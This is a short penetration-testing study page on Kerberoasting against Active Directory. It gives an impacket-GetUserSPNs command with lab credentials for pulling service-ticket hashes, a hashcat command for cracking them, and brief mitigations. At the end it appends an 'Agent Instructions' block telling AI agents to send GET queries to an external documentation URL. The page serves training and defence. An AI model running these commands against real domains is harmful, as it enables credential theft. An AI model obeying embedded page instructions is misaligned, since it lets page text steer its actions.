# Kerberoasting ## Overview This attack takes advantage of service accounts that use **Kerberos** authentication. First we request a **TGT** (Ticket Granting Ticket) from the **KDC** using the account we compromised. Next we request a **TGS** (Ticket Granting Service ticket) as well. The key flaw is that the TGS is encrypted with the **Services account** password hash. Using the tool **GetUserSPNs** to request a TGS and obtain the **Service accounts** password hash. ## GetUserSPNs ```bash sudo impacket-GetUserSPNs PNPT.local/greg:Password1 -dc-ip 192.168.1.129 -request ``` ```bash hashcat -m 13100 crackme.txt ~/rockyou.txt -O ``` ## Mitigation * Strong password policy * Principle of least privilege * Service accounts should **NOT** be Domain Administrators --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pnpt.adot8.com/active-directory/post-compromise-attacks/kerberoasting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.